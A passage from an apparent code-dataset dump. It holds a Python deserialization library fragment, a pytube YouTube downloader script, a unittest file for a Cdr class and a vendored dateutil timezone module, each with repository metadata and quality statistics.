# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
```
avg_line_length: 35.507143 | max_line_length: 148 | alphanum_fraction: 0.644002
Quality signals (qsc_code_*_quality_signal):
  num_words: 1,751 | num_chars: 14,913 | mean_word_length: 5.242147 | frac_words_unique: 0.173615
  frac_chars_top_2grams: 0.080837 | frac_chars_top_3grams: 0.03508 | frac_chars_top_4grams: 0.01961
  frac_chars_dupe_5grams: 0.266805 | dupe_6grams: 0.198279 | dupe_7grams: 0.136507 | dupe_8grams: 0.129971 | dupe_9grams: 0.124414 | dupe_10grams: 0.124414
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.000848 | frac_chars_whitespace: 0.288004
  size_file_byte: 14,913 | num_lines: 419 | num_chars_line_max: 149 | num_chars_line_mean: 35.591885
  frac_chars_alphabet: 0.863628 | frac_chars_comments: 0.189901 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.250896 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.115997 | frac_chars_long_word_length: 0.018425 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.021505 | cate_var_zero: false | frac_lines_pass: 0.003584 | frac_lines_import: 0.053763 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.154122 | frac_lines_print: 0
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
Record 6
hexsha: 13356a393bf8946042480c6de66561dc06a9116f | size: 3,796 | ext: py | lang: Python
repo path: script.py | repo name: devppratik/Youtube-Downloader | head_hexsha: ccdf31b83fbce2d05711c64dbad729c935c72b8a | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content:
```python
import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
file_size = int(filters.filesize)
if not filters:
filters = yt_obj.streams.filter(
progressive=True, file_extension='mp4').first()
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By Pratik Panda\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
```
avg_line_length: 33.008696 | max_line_length: 113 | alphanum_fraction: 0.670443
Quality signals (qsc_code_*_quality_signal):
  num_words: 461 | num_chars: 3,796 | mean_word_length: 5.318872 | frac_words_unique: 0.284165
  frac_chars_top_2grams: 0.078303 | frac_chars_top_3grams: 0.02447 | frac_chars_top_4grams: 0.023246
  frac_chars_dupe_5grams: 0.284666 | dupe_6grams: 0.21044 | dupe_7grams: 0.179445 | dupe_8grams: 0.153344 | dupe_9grams: 0.153344 | dupe_10grams: 0.111746
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.007005 | frac_chars_whitespace: 0.210221
  size_file_byte: 3,796 | num_lines: 114 | num_chars_line_max: 114 | num_chars_line_mean: 33.298246
  frac_chars_alphabet: 0.810874 | frac_chars_comments: 0.046628 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.195122 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.148358 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.097561 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.036585 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.170732 | frac_lines_print: 0.195122
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
Record 7
hexsha: 13372002afbafad592f6b286397c1829136d9e66 | size: 1,547 | ext: py | lang: Python
repo path: test/python/test.py | repo name: alex952/cdr | head_hexsha: e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content:
```python
#
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
```
avg_line_length: 20.355263 | max_line_length: 59 | alphanum_fraction: 0.541694
Quality signals (qsc_code_*_quality_signal):
  num_words: 208 | num_chars: 1,547 | mean_word_length: 3.889423 | frac_words_unique: 0.317308
  frac_chars_top_2grams: 0.049444 | frac_chars_top_3grams: 0.049444 | frac_chars_top_4grams: 0.033375
  frac_chars_dupe_5grams: 0.257108 | dupe_6grams: 0.163164 | dupe_7grams: 0.103832 | dupe_8grams: 0 | dupe_9grams: 0 | dupe_10grams: 0
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.078008 | frac_chars_whitespace: 0.312217
  size_file_byte: 1,547 | num_lines: 75 | num_chars_line_max: 60 | num_chars_line_mean: 20.626667
  frac_chars_alphabet: 0.682331 | frac_chars_comments: 0.020039 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.288462 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.028439 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0.134615
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.153846 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.038462 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.230769 | frac_lines_print: 0
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
Record 8
hexsha: 1337486fb7ecdf7c5699a609f50b6301a5037cab | size: 32,947 | ext: py | lang: Python
repo path: vendor/mo_times/vendor/dateutil/tz.py | repo name: klahnakoski/auth0-api | head_hexsha: eda9c2554c641da76687f64445b8d35543d012d9 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content (the file is truncated at the end of this dump):
"""
Copyright (c) 2003-2007 Gustavo Niemeyer <gustavo@niemeyer.net>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
# dst offset, so I belive that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
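        # When no explicit rules are supplied, the defaults below encode the
        # historical (pre-2007) US DST window: DST starts on the first Sunday
        # of April at 02:00 and ends on the last Sunday of October (the end
        # rule is expressed in standard time, hence hours=+1).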
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
